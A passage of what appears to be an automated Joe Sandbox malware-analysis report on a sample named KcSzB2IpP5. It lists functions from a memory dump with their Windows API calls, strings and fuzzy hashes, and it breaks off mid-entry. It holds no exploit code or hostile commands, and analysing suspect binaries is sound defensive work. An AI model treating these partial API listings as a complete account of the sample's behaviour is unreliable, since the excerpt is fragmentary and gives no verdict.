GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00484DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00484D1E,004928E9,?,00484CBE,004928E9,005288B8,0000000C,00484E15,004928E9,00000002,00000000), ref: 00484DC3

Strings

CorExitProcess, xrefs: 00484D98
mscoree.dll, xrefs: 00484D86

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 8854c84f29abc4edb5cb141b2bbdf78fa13f6c06b91c67600870cee316b01c72
Instruction ID: f2388e7f2f3aa5b2b854e34a2564ff1a5603af229334a345afa18aafb5bb6f22
Opcode Fuzzy Hash: 8854c84f29abc4edb5cb141b2bbdf78fa13f6c06b91c67600870cee316b01c72
Instruction Fuzzy Hash: 39F0C230A0020DBBDB10AF90DD49BAEBFF5EF44752F0000A9F805A26A0CB345D54DF99

Function 00464E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00464EDD,?,00531418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00464E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00464EAE
FreeLibrary.KERNEL32(00000000,?,?,00464EDD,?,00531418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00464EC0

Strings

kernel32.dll, xrefs: 00464E94
Wow64DisableWow64FsRedirection, xrefs: 00464EA8

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 4345362bd917a168fade46d47b3e681aad06e59772445af3be6ffeb86ba1707e
Instruction ID: d1f5e1e65084f1b6d877130e91cb43e1de988a164caf32f8358bfe33bf0f73be
Opcode Fuzzy Hash: 4345362bd917a168fade46d47b3e681aad06e59772445af3be6ffeb86ba1707e
Instruction Fuzzy Hash: 4CE08635A015265B96211725BE58B7B6654AFC2B637050126FD04D2244EB68CD1184AA

Function 00464E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,004A3CDE,?,00531418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00464E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00464E74
FreeLibrary.KERNEL32(00000000,?,?,004A3CDE,?,00531418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00464E87

Strings

kernel32.dll, xrefs: 00464E5B
Wow64RevertWow64FsRedirection, xrefs: 00464E6E

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 426cc300a48a4f4dcd51059a34f1306babe7c0ad8b20d20bdcc0c810ce7b6473
Instruction ID: 6b0625724a834bf258eaa71f4c82382a047803a438a11fff4ff1d1db2ff34494
Opcode Fuzzy Hash: 426cc300a48a4f4dcd51059a34f1306babe7c0ad8b20d20bdcc0c810ce7b6473
Instruction Fuzzy Hash: 1BD0C2396026365B4B221B24BE48EAB2A18AFC1B213050223B904A2214EF29CD21C9DD

Function 004EA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 004EA427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004EA435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 004EA468
CloseHandle.KERNEL32(?), ref: 004EA63D

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 980a221cdac6b31590eb903bb0cd6627f91550235637751d84b775d394f45690
Instruction ID: 919a8bdb7c6d25c6fc5da78bcdead9c59588a3346220278900369a750b39dd8f
Opcode Fuzzy Hash: 980a221cdac6b31590eb903bb0cd6627f91550235637751d84b775d394f45690
Instruction Fuzzy Hash: BCA19171604300AFD720DF25C886B2AB7E1AF84718F14885EF59A9B3D2D7B4EC518B96

Function 0049BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00503700), ref: 0049BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0053121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0049BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00531270,000000FF,?,0000003F,00000000,?), ref: 0049BC36
_free.LIBCMT ref: 0049BB7F

Part of subcall function 004929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0049D7D1,00000000,00000000,00000000,00000000,?,0049D7F8,00000000,00000007,00000000,?,0049DBF5,00000000), ref: 004929DE
Part of subcall function 004929C8: GetLastError.KERNEL32(00000000,?,0049D7D1,00000000,00000000,00000000,00000000,?,0049D7F8,00000000,00000007,00000000,?,0049DBF5,00000000,00000000), ref: 004929F0

_free.LIBCMT ref: 0049BD4B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 12729f957460f952218c56e4157ed0a3b46c9be3c794c0d3d567fc7513ca610a
Instruction ID: d19155c3e069b19ab48f58e22417ce0927c57747b80aa4d1e165d0e9e42ef00e
Opcode Fuzzy Hash: 12729f957460f952218c56e4157ed0a3b46c9be3c794c0d3d567fc7513ca610a
Instruction Fuzzy Hash: F551C371900209ABCF20EF66AE8196FBFB8EB51314B10427FE414D7291DB749D459BD8

Function 004CE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004CDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004CCF22,?), ref: 004CDDFD

Part of subcall function 004CDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004CCF22,?), ref: 004CDE16

Part of subcall function 004CE199: GetFileAttributesW.KERNEL32(?,004CCF95), ref: 004CE19A

lstrcmpiW.KERNEL32(?,?), ref: 004CE473
MoveFileW.KERNEL32(?,?), ref: 004CE4AC
_wcslen.LIBCMT ref: 004CE5EB
_wcslen.LIBCMT ref: 004CE603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 004CE650

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: ad097d1f951d310deb7738e84a2ec44775171aaef1da238f7007c8e639b0c110
Instruction ID: efba61ce4344dae0a7cd6ca9a702d44c762d928ff942f8f1db099da6ba002698
Opcode Fuzzy Hash: ad097d1f951d310deb7738e84a2ec44775171aaef1da238f7007c8e639b0c110
Instruction Fuzzy Hash: 4C516FB24087455BC764EB95CC81EEF73DCAF84344F00092FE68993191EF78A588876E

Function 004EB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

Part of subcall function 004EC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004EB6AE,?,?), ref: 004EC9B5
Part of subcall function 004EC998: _wcslen.LIBCMT ref: 004EC9F1
Part of subcall function 004EC998: _wcslen.LIBCMT ref: 004ECA68
Part of subcall function 004EC998: _wcslen.LIBCMT ref: 004ECA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004EBAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004EBB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 004EBB63
RegCloseKey.ADVAPI32(?,?), ref: 004EBBA6
RegCloseKey.ADVAPI32(00000000), ref: 004EBBB3

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 9682311ac85624c81e6d694cadf31f942bb28ae11c630e377dedc2a361d29551
Instruction ID: 61420885b20a0bad7ce7bdc00d8c24e1c533f76c16d37ee577eb92bc273c3757
Opcode Fuzzy Hash: 9682311ac85624c81e6d694cadf31f942bb28ae11c630e377dedc2a361d29551
Instruction Fuzzy Hash: EC61A331208241AFD714DF15C890E2BBBE5FF84348F14856EF4998B2A2DB35ED46CB96

Function 004C8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004C8BCD
VariantClear.OLEAUT32 ref: 004C8C3E
VariantClear.OLEAUT32 ref: 004C8C9D
VariantClear.OLEAUT32(?), ref: 004C8D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004C8D3B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 4a3162f91fccd95e05bfe671968eac4e19d7b8fc49d5132d5450d1fe410c88b5
Instruction ID: a41d2b171184f8bf700fc36258319a67491fbddf3fd3420c403e835c46a76638
Opcode Fuzzy Hash: 4a3162f91fccd95e05bfe671968eac4e19d7b8fc49d5132d5450d1fe410c88b5
Instruction Fuzzy Hash: 46515AB5A00219EFCB10CF58D884EAAB7F4FF89314B15856EE906DB350E734E911CB94

Function 004D8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004D8BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 004D8BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 004D8C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 004D8C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004D8C5F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: eae9d30550727c8eec8dbc88470fc95af5d95d2ad2328e8db0c1a9c17dfbc11d
Instruction ID: 567ef88cd46edb0924b19575eb1675fa533c3c996823bddbab508cac3ae6d734
Opcode Fuzzy Hash: eae9d30550727c8eec8dbc88470fc95af5d95d2ad2328e8db0c1a9c17dfbc11d
Instruction Fuzzy Hash: FF515F35A00214EFCB04DF55C890A6ABBF5FF48318F04849EE849AB362DB35ED51CB95

Function 004E8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 004E8F40
GetProcAddress.KERNEL32(00000000,?), ref: 004E8FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 004E8FEC
GetProcAddress.KERNEL32(00000000,?), ref: 004E9032
FreeLibrary.KERNEL32(00000000), ref: 004E9052

Part of subcall function 0047F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,004D1043,?,761DE610), ref: 0047F6E6
Part of subcall function 0047F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,004BFA64,00000000,00000000,?,?,004D1043,?,761DE610,?,004BFA64), ref: 0047F70D

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: db11aa0ca0b1f43e3bccc99a46447aafd7e88a935b65a4db49ae4243fa6d8399
Instruction ID: fc1c06fe247f0b8e98dd13ac2700a22156e8e6c43aca5e850688b7a323d543b2
Opcode Fuzzy Hash: db11aa0ca0b1f43e3bccc99a46447aafd7e88a935b65a4db49ae4243fa6d8399
Instruction Fuzzy Hash: 0F514F35600245DFCB11DF55C4948AEBBF1FF49319B0480AAE80A9B362EB35ED86CF95

Function 004F6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 004F6C33
SetWindowLongW.USER32(?,000000EC,?), ref: 004F6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 004F6C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,004DAB79,00000000,00000000), ref: 004F6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 004F6CC7

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 2e35df4cdef0ce7a024761f56204456ff6a12f080c4f827bc5d95459e72ea653
Instruction ID: 1e2111d2569dfc33bfb4d10861e9a131baa86a0d566f61012ee1e3664245f500
Opcode Fuzzy Hash: 2e35df4cdef0ce7a024761f56204456ff6a12f080c4f827bc5d95459e72ea653
Instruction Fuzzy Hash: 1C41E23560415CAFD724CF28CD98FBA7BA4EB09350F06022AFA95E73E0C375AD51DA48

Function 00492051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004920C3
_free.LIBCMT ref: 004920E3

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fd39f936ef7493f84dee447cbb9bf2d7aec6efcfe75a554f0dec6ceec37e7c8d
Instruction ID: d3731753ba31a5d2ecc430037915b8a0b5debdf6b5b4b68cb1b13bfca2e3ba3a
Opcode Fuzzy Hash: fd39f936ef7493f84dee447cbb9bf2d7aec6efcfe75a554f0dec6ceec37e7c8d
Instruction Fuzzy Hash: 69410272A00200AFCF20DF79CA81A5EBBE1EF89314F15857AE605EB352D675AD01CB85

Function 004D3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 004D38CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 004D3922
TranslateMessage.USER32(?), ref: 004D394B
DispatchMessageW.USER32(?), ref: 004D3955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004D3966

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: b65fbd3078d303456a81a0586506280d91caf4b1c534b22470316ae1923588c1
Instruction ID: 9883b8860815ab731667732b3030ea2865a0a8676297525a284280c6153f3192
Opcode Fuzzy Hash: b65fbd3078d303456a81a0586506280d91caf4b1c534b22470316ae1923588c1
Instruction Fuzzy Hash: 4F31B6B05047459EEB25CF359878BB737E4AB15306F0405ABE462823A0D3F8A689DB1B

Function 004DCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,004DC21E,00000000), ref: 004DCF38
InternetReadFile.WININET(?,00000000,?,?), ref: 004DCF6F
GetLastError.KERNEL32(?,00000000,?,?,?,004DC21E,00000000), ref: 004DCFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,004DC21E,00000000), ref: 004DCFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,004DC21E,00000000), ref: 004DCFF2

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 4a6329324231a31933dd375b5365824cfb4a1383c9e6557ddee1dd8bf158d014
Instruction ID: 6dd7944a7fba6240e5852f6f52f0ec4ebf3d68f93a0d5c5f8413c5e54c8f8914
Opcode Fuzzy Hash: 4a6329324231a31933dd375b5365824cfb4a1383c9e6557ddee1dd8bf158d014
Instruction Fuzzy Hash: CF314D71504206AFDB20DFA5C9D49ABBBFAEB14354B10446FF506D2380DB38AD45DB68

Function 004C1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 004C1915
PostMessageW.USER32(00000001,00000201,00000001), ref: 004C19C1
Sleep.KERNEL32(00000000,?,?,?), ref: 004C19C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 004C19DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 004C19E2

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: a1fc3b355529eedf8e82529c0907d667c7d5520fddcfc1ea376c93d4a8837d5b
Instruction ID: c03692773953a8e6dfedc9acb39b035e51c588f187b1be214059de660010a2bd
Opcode Fuzzy Hash: a1fc3b355529eedf8e82529c0907d667c7d5520fddcfc1ea376c93d4a8837d5b
Instruction Fuzzy Hash: 2731CFB5900219EFDB00CFA8C998FEE3BB5EB05314F00422AF921A72E1C3749954CB95

Function 004F5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 004F5745
SendMessageW.USER32(?,00001074,?,00000001), ref: 004F579D
_wcslen.LIBCMT ref: 004F57AF
_wcslen.LIBCMT ref: 004F57BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 004F5816

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 985d4eb22aa4c8a9e7f5ba295839577314e9799bb6d7219602aa9d79d0304176
Instruction ID: d5093821619ef7c258f42e0b654c63ab2e7e7acb95c68bb74963378c42252831
Opcode Fuzzy Hash: 985d4eb22aa4c8a9e7f5ba295839577314e9799bb6d7219602aa9d79d0304176
Instruction Fuzzy Hash: 1121A77190461C9ADB20DF60CC84AFEB7B8FF04324F108117EB19DA280D7788985CF59

Function 004E0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 004E0951
GetForegroundWindow.USER32 ref: 004E0968
GetDC.USER32(00000000), ref: 004E09A4
GetPixel.GDI32(00000000,?,00000003), ref: 004E09B0
ReleaseDC.USER32(00000000,00000003), ref: 004E09E8

Memory Dump Source

